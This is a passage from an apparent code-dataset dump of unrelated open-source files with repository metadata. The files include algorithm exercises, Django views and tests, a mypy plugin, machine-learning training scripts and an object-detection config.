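# above): gia = giaivins(); then assign per-vertex arrays of length
# md.mesh.numberofvertices to gia.mantle_viscosity and
# gia.lithosphere_thickness before the model is marshalled.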
|
[
"[email protected]"
] | |
fa4c4bebb84eeea7871eaf044e4ec0be599f769c
|
3d9506b859cdbf38a21549cd3d64b69ecde7674e
|
/GoogleCodeJam/2020KickstartRoundB/BusRoute.py
|
b7cceed2c849cd5b217cc8829a02467223137486
|
[] |
no_license
|
bradykim7/Algorithm
|
1ae4c6e4e6d72687b660ddf0768a9174cc8d7b8c
|
053210a1205f4e62b367f85b65dcb60fcad74008
|
refs/heads/master
| 2022-06-25T04:46:55.265058 | 2022-06-17T08:08:52 | 2022-06-17T08:08:52 | 233,500,101 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 349 |
py
|
import sys;
if __name__=='__main__':
t = int(input());
for i in range(t):
nd = input().split();
n=int(nd[0]); d=int(nd[1]);
ans =d;
        x = list(map(int, input().rstrip().split()))
        # work backwards from the last bus: snap the running day down to
        # the latest multiple of each route's interval (greedy from the end);
        # the original forward pass 'ans -= d % j' miscounts when the
        # remainders interact
        for j in reversed(x):
            ans -= ans % j
print('Case #%d: %d'%(i+1,ans))
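# worked check (sample-style, editor's aside): d = 10, x = [3, 7, 2]
# reversed: 10 - 10 % 2 = 10; 10 - 10 % 7 = 7; 7 - 7 % 3 = 6 -> answer 6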
|
[
"[email protected]"
] | |
5b98146395ad29c6511925bbc47a3402f1251fa2
|
1e168ced1a4bdb53967021e082b98027aea9d38a
|
/1.알고리즘정리/정렬/삽입정렬.py
|
6e0f94afc79ed7d33b51a468d14c6182e85e3d68
|
[] |
no_license
|
vvspearlvvs/CodingTest
|
3ebf921308570ac11eb87e6660048ccfcaf90ce4
|
fc61b71d955f73ef8710f792d008bc671614ef7a
|
refs/heads/main
| 2023-07-13T15:57:11.312519 | 2021-08-25T02:15:28 | 2021-08-25T02:15:28 | 354,232,513 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 282 |
py
|
# insertion sort
arr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]
for i in range(len(arr)):
for j in range(i,0,-1):
        if arr[j]<arr[j-1]: # shift one step to the left
arr[j],arr[j-1]=arr[j-1],arr[j]
else:
break
print(arr)
print("최종")
print(arr)
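# quick trace (editor's aside): each pass inserts arr[i] into the already
# sorted prefix arr[0:i] by swapping leftwards; e.g. after i = 1 the prefix
# [7, 5] has become [5, 7], and 9 then stays put at i = 2.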
|
[
"[email protected]"
] | |
8b0bcb3eb0687fab864e824994d9b70939870f5d
|
5bcee9248d0bdebb134c61b4d0a3f3113337a569
|
/lesson_0902/01_lists.py
|
816ff09874e0073dca2b2f3d1f0fd9d842bcbb7b
|
[] |
no_license
|
100ballovby/6V_Lesson
|
c2edbc652ea2ebec07eeed60060c16ae4b4792e4
|
4b6dfda323a628558bd63bd5569960004fc335dd
|
refs/heads/master
| 2023-05-08T07:49:14.569854 | 2021-05-25T06:40:53 | 2021-05-25T06:40:53 | 330,888,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,044 |
py
|
'''
A list is an ordered data structure enclosed in square
brackets. Its elements are separated by commas.
To create a list, think up a name for it, put the assignment sign (=),
and open square brackets.
my_list = [1, 26, 15, 5.6, 'hello, Andrey']
'''
cars = ['audi', 'mercedes', 'toyota', 'skoda', 'seat']
# print the whole list
print(cars)
# print the toyota from the list
print(cars[2])
print(cars[-1])  # print the last element of the list
import random  # the random module produces randomness
print('My first car was', cars[random.randint(0, 4)])
# randint(a, b) - return a random integer (random int)
# in the range from a to b
print(random.randint(-100, 100))
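# aside (not in the original lesson): random.choice(cars) picks a random
# element directly and avoids hard-coding the index range 0..4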
|
[
"[email protected]"
] | |
b6683e488f292d0548f63346115c9b555ac19d7a
|
b7c1e5d140c3c41e86f206047145f7f296fed53a
|
/Textbook/Chapter 5/pandasSeriesVsDataFrame.py
|
e8417f1cc0a8b2c5317aff757d4ee250887236df
|
[
"MIT"
] |
permissive
|
jlcatonjr/Learn-Python-for-Stats-and-Econ
|
c2fbe29b324e70ceb832beafdd42d0accb37d9f9
|
194671592937562e08c92e0ef5f4793d4911701c
|
refs/heads/master
| 2023-05-11T17:17:05.934290 | 2023-05-10T20:12:10 | 2023-05-10T20:12:10 | 148,912,065 | 22 | 21 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
#pandasSeriesVsDataFrame.py
import numpy as np
import pandas as pd
dataDict = {"range":np.arange(10)}
dataSeries = pd.Series(dataDict)
print(dataSeries)
print(dataSeries["range"])
dataDF=pd.DataFrame(dataDict)
print(dataDF)
print(dataDF["range"])
print(dataDF["range"][5:9])
#print(dataDF.loc[5:9])
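# note (editor's aside): positional slicing dataDF["range"][5:9] excludes
# label 9, while label-based dataDF.loc[5:9] includes both endpoints --
# .loc slices are inclusive.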
|
[
"[email protected]"
] | |
7baa26a26fc7ed616e1f4cfa37d283d39e72ebf3
|
bbdd7f44884844cd0f7332d63945852dc2b53083
|
/mypy_drf_plugin/transformers/fields.py
|
f4f8a10b2f9cc833f0b0e6cedc3fe13340f2fdf9
|
[
"MIT"
] |
permissive
|
private-forks/djangorestframework-stubs
|
e258e1dfc2af80fdf93322338ea3ce5452087e2d
|
18427718c913f3d23ef7a4636c8205df42999cf2
|
refs/heads/master
| 2020-04-25T09:11:04.067894 | 2019-02-24T22:25:03 | 2019-02-24T22:25:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,241 |
py
|
from mypy.nodes import TypeInfo, Var
from mypy.plugin import FunctionContext
from mypy.types import AnyType, Instance, Type, TypeOfAny
from mypy_django_plugin import helpers
def get_private_descriptor_type(type_info: TypeInfo, private_field_name: str, is_nullable: bool) -> Type:
if not type_info.has_readable_member(private_field_name):
return AnyType(TypeOfAny.unannotated)
node = type_info.get(private_field_name).node
if isinstance(node, Var):
descriptor_type = node.type
if is_nullable:
descriptor_type = helpers.make_optional(descriptor_type)
return descriptor_type
return AnyType(TypeOfAny.unannotated)
def fill_parameters_of_descriptor_methods_from_private_attributes(ctx: FunctionContext) -> Type:
default_return_type = ctx.default_return_type
if not isinstance(default_return_type, Instance):
return default_return_type
is_nullable = bool(helpers.parse_bool(helpers.get_argument_by_name(ctx, 'allow_null')))
get_type = get_private_descriptor_type(default_return_type.type, '_pyi_private_get_type',
is_nullable=is_nullable)
return helpers.reparametrize_instance(default_return_type, [get_type])
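# note (editor's aside, partially inferred): the hook above reads the stub's
# private _pyi_private_get_type attribute and, when allow_null=True is
# passed (e.g. to a serializer field), wraps that type in Optional before
# reparametrizing the returned field instance.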
|
[
"[email protected]"
] | |
e02299e147fabe086c8864cff41d59b0059baa48
|
4da0c8906c9cd671e3a4bee3a6ee801a353e3d9a
|
/Water/Water/urls.py
|
8ce00454b8099894f86046e7d4be2dfd650f7cf9
|
[] |
no_license
|
avpakh/GVK
|
2a5a699caa8a986a3fd0dadbe2160fc9da5bf193
|
ac8b8d8ad5cd5ef8485e98cd532a29cd420e0cae
|
refs/heads/master
| 2020-06-13T10:35:36.663668 | 2017-01-06T09:01:42 | 2017-01-06T09:01:42 | 75,392,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,335 |
py
|
"""Water URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from watres import urls as watres_url
from watstat import urls as watstat_url
from watres import views
from django.conf.urls.static import static
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$',views.index_view),
url(r'^watres/',include(watres_url)),
url(r'^watstat/',include(watstat_url)),
]
if settings.DEBUG:
if settings.MEDIA_ROOT:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += staticfiles_urlpatterns()
|
[
"[email protected]"
] | |
64acd726fc80f2bd6451b0e36ae4cde1f625e944
|
8c2de4da068ba3ed3ce1adf0a113877385b7783c
|
/hyperion/torch/trainers/xvector_trainer.py
|
190b2a30b1c2f28d38d0c6999040ce4ae6a76f9f
|
[
"Apache-2.0"
] |
permissive
|
hyperion-ml/hyperion
|
a024c718c4552ba3a03aae2c2ca1b8674eaebc76
|
c4c9eee0acab1ba572843373245da12d00dfffaa
|
refs/heads/master
| 2023-08-28T22:28:37.624139 | 2022-03-25T16:28:08 | 2022-03-25T16:28:08 | 175,275,679 | 55 | 20 |
Apache-2.0
| 2023-09-13T15:35:46 | 2019-03-12T18:40:19 |
Python
|
UTF-8
|
Python
| false | false | 5,015 |
py
|
"""
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import os
from collections import OrderedDict as ODict
import logging
import torch
import torch.nn as nn
from ..utils import MetricAcc
from .torch_trainer import TorchTrainer
class XVectorTrainer(TorchTrainer):
"""Trainer to train x-vector style models.
Attributes:
model: x-Vector model object.
optim: pytorch optimizer object or options dict
epochs: max. number of epochs
exp_path: experiment output path
cur_epoch: current epoch
grad_acc_steps: gradient accumulation steps to simulate larger batch size.
device: cpu/gpu device
metrics: extra metrics to compute besides cxe.
lrsched: learning rate scheduler object or options dict
loggers: LoggerList object, loggers write training progress to std. output and file.
If None, it uses default loggers.
ddp: if True use distributed data parallel training
ddp_type: type of distributed data parallel in (ddp, oss_ddp, oss_shared_ddp)
loss: if None, it uses cross-entropy
train_mode: training mode in ['train', 'ft-full', 'ft-last-layer']
use_amp: uses mixed precision training.
log_interval: number of optim. steps between log outputs
use_tensorboard: use tensorboard logger
use_wandb: use wandb logger
wandb: wandb dictionary of options
grad_clip: norm to clip gradients, if 0 there is no clipping
grad_clip_norm: norm type to clip gradients
swa_start: epoch to start doing swa
swa_lr: SWA learning rate
swa_anneal_epochs: SWA learning rate anneal epochs
cpu_offload: CPU offload of gradients when using fully sharded ddp
"""
def __init__(
self,
model,
optim={},
epochs=100,
exp_path="./train",
cur_epoch=0,
grad_acc_steps=1,
device=None,
metrics=None,
lrsched=None,
loggers=None,
ddp=False,
ddp_type="ddp",
loss=None,
train_mode="train",
use_amp=False,
log_interval=10,
use_tensorboard=False,
use_wandb=False,
wandb={},
grad_clip=0,
grad_clip_norm=2,
swa_start=0,
swa_lr=1e-3,
swa_anneal_epochs=10,
cpu_offload=False,
):
if loss is None:
loss = nn.CrossEntropyLoss()
super().__init__(
model,
loss,
optim,
epochs,
exp_path,
cur_epoch=cur_epoch,
grad_acc_steps=grad_acc_steps,
device=device,
metrics=metrics,
lrsched=lrsched,
loggers=loggers,
ddp=ddp,
ddp_type=ddp_type,
train_mode=train_mode,
use_amp=use_amp,
log_interval=log_interval,
use_tensorboard=use_tensorboard,
use_wandb=use_wandb,
wandb=wandb,
grad_clip=grad_clip,
grad_clip_norm=grad_clip_norm,
swa_start=swa_start,
swa_lr=swa_lr,
swa_anneal_epochs=swa_anneal_epochs,
cpu_offload=cpu_offload,
)
def train_epoch(self, data_loader):
"""Training epoch loop
Args:
data_loader: pytorch data loader returning features and class labels.
"""
self.model.update_loss_margin(self.cur_epoch)
metric_acc = MetricAcc(device=self.device)
batch_metrics = ODict()
self.set_train_mode()
for batch, (data, target) in enumerate(data_loader):
self.loggers.on_batch_begin(batch)
if batch % self.grad_acc_steps == 0:
self.optimizer.zero_grad()
data, target = data.to(self.device), target.to(self.device)
batch_size = data.shape[0]
with self.amp_autocast():
output = self.model(data, target, **self.amp_args)
loss = self.loss(output, target).mean() / self.grad_acc_steps
if self.use_amp:
self.grad_scaler.scale(loss).backward()
else:
loss.backward()
if (batch + 1) % self.grad_acc_steps == 0:
if self.lr_scheduler is not None and not self.in_swa:
self.lr_scheduler.on_opt_step()
self.update_model()
batch_metrics["loss"] = loss.item() * self.grad_acc_steps
for k, metric in self.metrics.items():
batch_metrics[k] = metric(output, target)
metric_acc.update(batch_metrics, batch_size)
logs = metric_acc.metrics
logs["lr"] = self._get_lr()
self.loggers.on_batch_end(logs=logs, batch_size=batch_size)
logs = metric_acc.metrics
logs = ODict(("train_" + k, v) for k, v in logs.items())
logs["lr"] = self._get_lr()
return logs
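# minimal usage sketch (editor's aside; only the constructor and
# train_epoch appear in this file -- the optimizer options dict and the
# data loader below are placeholders/assumptions):
#   trainer = XVectorTrainer(model, optim=optim_opts, epochs=100,
#                            exp_path="./exp/xvector", device=device)
#   logs = trainer.train_epoch(train_loader)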
|
[
"[email protected]"
] | |
f352ec7987f6f9addb4cc8a333cc19463e602697
|
5332fef91e044555e605bb37cbef7c4afeaaadb0
|
/hy-data-analysis-with-python-2020/part02-e06_file_count/test/test_file_count.py
|
c7d3f00f44cd8f760c403784983ad6ec08d26a70
|
[] |
no_license
|
nopomi/hy-data-analysis-python-2019
|
f3baa96bbe9b6ee7f0b3e6f6b8b0f3adfc3b6cc8
|
464685cb377cfdeee890a008fbfbd9ed6e3bcfd0
|
refs/heads/master
| 2021-07-10T16:16:56.592448 | 2020-08-16T18:27:38 | 2020-08-16T18:27:38 | 185,044,621 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,560 |
py
|
#!/usr/bin/env python3
import sys
import unittest
from unittest.mock import patch
from itertools import repeat
from tmc import points
from tmc.utils import load, get_out
module_name="src.file_count"
file_count = load(module_name, "file_count")
main = load(module_name, "main")
class FileCount(unittest.TestCase):
@points('p02-06.1')
def test_first(self):
l, w, c = file_count("src/test.txt")
self.assertEqual(l, 8, msg="Wrong number of lines for file 'test.txt'!")
self.assertEqual(w, 105, msg="Wrong number of words for file 'test.txt'!")
self.assertEqual(c, 647, msg="Wrong number of characters for file 'test.txt'!")
@points('p02-06.1')
def test_calls(self):
with patch('builtins.open', side_effect=open) as o:
file_count("src/test.txt")
o.assert_called_once()
@points('p02-06.2')
def test_main(self):
orig_argv = sys.argv
n = 7
sys.argv[1:] = ["file%i" % i for i in range(n)]
with patch('src.file_count.file_count', side_effect=repeat((0,0,0))) as fc:
main()
self.assertEqual(fc.call_count, n,
msg="Wrong number of calls to function 'file_count' for %i command line parameters!" % n)
result = get_out().split('\n')
for i, line in enumerate(result):
self.assertEqual(line.strip(), "0\t0\t0\tfile%i" % i,
msg="Wrong result on line %i!" % i)
sys.argv = orig_argv
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
0340fad6844580f9a0ff3797769971efcc2f644a
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Bioinformatics Textbook Track/Chapter 1/rosalind_ba1d.py
|
4e6d4b0953bb2d76fa147c0368a4f8c3ded360aa
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null |
UTF-8
|
Python
| false | false | 747 |
py
|
def occurrences(genome, sub):
"""
:param genome: genome for processing
:param sub: pattern for which we find indexes of occurnces
:return: list of indexes
"""
start = 0
indexes = []
while True:
start = genome.find(sub, start)
        # find() returns -1 when there is no further match; testing
        # 'start > 0' would wrongly drop a match at index 0
        if start != -1:
            indexes.append(start)
        else:
            break
start += 1
return indexes
def read_data_from(file_name):
with open(file_name, "r") as file:
pattern = file.readline().strip()
genome = file.readline().strip()
return genome, pattern
if __name__ == "__main__":
genome, pattern = read_data_from("rosalind_ba1d.txt")
indexes = occurrences(genome, pattern)
for ind in indexes:
print ind,
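# sample check (Rosalind BA1D style, editor's aside):
# occurrences("GATATATGCATATACTT", "ATAT") -> [1, 3, 9] (0-based positions)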
|
[
"[email protected]"
] | |
f1c755702c61d3a4c3f5e88391da6a3096250b2f
|
5399dd4580ea3f528753bc8b52a981743d62f8bb
|
/keras/keras36_hist3_wine.py
|
6844fef8e2c4a5ad39b62167985de24abdf45314
|
[] |
no_license
|
iwillbeaprogramer/Study
|
3ac7c118ffe3981d78b4ad263cb62432eae13970
|
3bfe571da5bbfc545b994e5878e217f9306bde14
|
refs/heads/main
| 2023-05-07T16:31:05.564973 | 2021-05-27T14:50:00 | 2021-05-27T14:50:00 | 324,044,441 | 8 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,733 |
py
|
from sklearn.datasets import load_wine
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler,OneHotEncoder
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.callbacks import EarlyStopping
import matplotlib.pyplot as plt
early_stopping = EarlyStopping(monitor='loss',patience=10)
datasets = load_wine()
x = datasets.data
y = datasets.target
encoder = OneHotEncoder()
y = encoder.fit_transform(y.reshape(-1,1)).toarray()
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2)
x_train,x_val,y_train,y_val = train_test_split(x_train,y_train,test_size=0.2)
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
# use transform (not fit_transform) on test/val so they are scaled with
# statistics learned from the training set
x_test = scaler.transform(x_test)
x_val = scaler.transform(x_val)
model = Sequential()
model.add(Dense(128,activation='relu',input_dim=13))
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
hist = model.fit(x_train,y_train,validation_data=(x_val,y_val),epochs=300,batch_size=4)
loss = model.evaluate(x_test,y_test,batch_size=4)
y_pred = model.predict(x_test)
print('loss : ',loss[0],'\naccuracy : ',loss[1])
'''
DNN
loss : 3.391478821868077e-05
accuracy : 1.0
'''
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('loss & acc')
plt.ylabel('loss, acc')
plt.xlabel('epochs')
plt.legend(['train_loss','val_loss','train_acc','val_acc'])
plt.show()
|
[
"[email protected]"
] | |
01ed2276aaa8ccf051e68654900f77f99150ae15
|
4de03eecadc4c69caf792f4773571c2f6dbe9d68
|
/tests/seahub/share/views/test_send_shared_link.py
|
c265c943065929d26d603cb4f387bfa7dd71b7aa
|
[
"Apache-2.0"
] |
permissive
|
Tr-1234/seahub
|
c1663dfd12f7584f24c160bcf2a83afdbe63a9e2
|
ed255e0566de054b5570218cb39cc320e99ffa44
|
refs/heads/master
| 2022-12-23T16:20:13.138757 | 2020-10-01T04:13:42 | 2020-10-01T04:13:42 | 300,138,290 | 0 | 0 |
Apache-2.0
| 2020-10-01T04:11:41 | 2020-10-01T04:11:40 | null |
UTF-8
|
Python
| false | false | 3,204 |
py
|
from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='[email protected]')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == '[email protected]'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email= '[email protected]'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
|
[
"[email protected]"
] | |
775b26f16fa53c27ec712bf92cfb31553c92f19d
|
e24511af0fdf299130fdf1e27b7eda1e35064e7c
|
/app/coupon/apps.py
|
bab96066b77b4592b0cf454c6ef51fa085d53a67
|
[] |
no_license
|
amitbhalla/lms
|
623dc6764dba5ee67a7f30d3882b7917b6441c2e
|
0810a875008b371a7bd3996742ad3b04ce037b14
|
refs/heads/main
| 2023-07-19T12:12:40.570958 | 2021-09-17T16:55:29 | 2021-09-17T16:55:29 | 405,055,595 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
|
[
"[email protected]"
] | |
84340a119e8fdb72320174077f9aa1c0605ca64f
|
9d566e153a254390ed758f4e945781899b6dcd07
|
/03_django/02_django_crud/articles/views.py
|
e9c78e872870c579df912051bc9513f1f01afb88
|
[] |
no_license
|
baambox5/TIL
|
6f1b0fdc342ed29b85a68404b916fc6f4cace7bf
|
0419779ccbf506a1e89d581b98658dd07b78388c
|
refs/heads/master
| 2023-01-13T01:14:08.125234 | 2020-01-17T14:36:34 | 2020-01-17T14:36:34 | 195,918,108 | 0 | 0 | null | 2023-01-07T11:27:08 | 2019-07-09T02:31:02 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,964 |
py
|
from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
    articles = Article.objects.order_by('-pk') # ordering done by the DB (preferred when possible)
    # articles = Article.objects.all()[::-1] # reversed in Python instead
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
        return redirect(article) # main page
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
    # the article being commented on
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
        # comment content submitted from the form
content = request.POST.get('content')
        # create and save the comment
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk)
|
[
"[email protected]"
] | |
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b
|
39e03684081b27311385a0ab31afcc2e09883e5c
|
/configs/reppoints/bbox_r50_grid_center_fpn_1x.py
|
f971b5b7b8c78a6abca727e7015b96d085b5f33b
|
[
"MIT",
"Python-2.0"
] |
permissive
|
witnessai/MMSceneGraph
|
8d0b2011a946ddcced95fbe15445b7f4da818509
|
bc5e0f3385205404c712ae9f702a61a3191da0a1
|
refs/heads/master
| 2023-08-12T06:54:00.551237 | 2021-10-12T03:04:21 | 2021-10-12T03:04:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,462 |
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"[email protected]"
] | |
0187aa1b8fa9854b1f253d952bda031992f4b423
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/old/pddbm/bug3.py
|
7d0a81d444b74c37e2e621dc7a08f50608b54c18
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
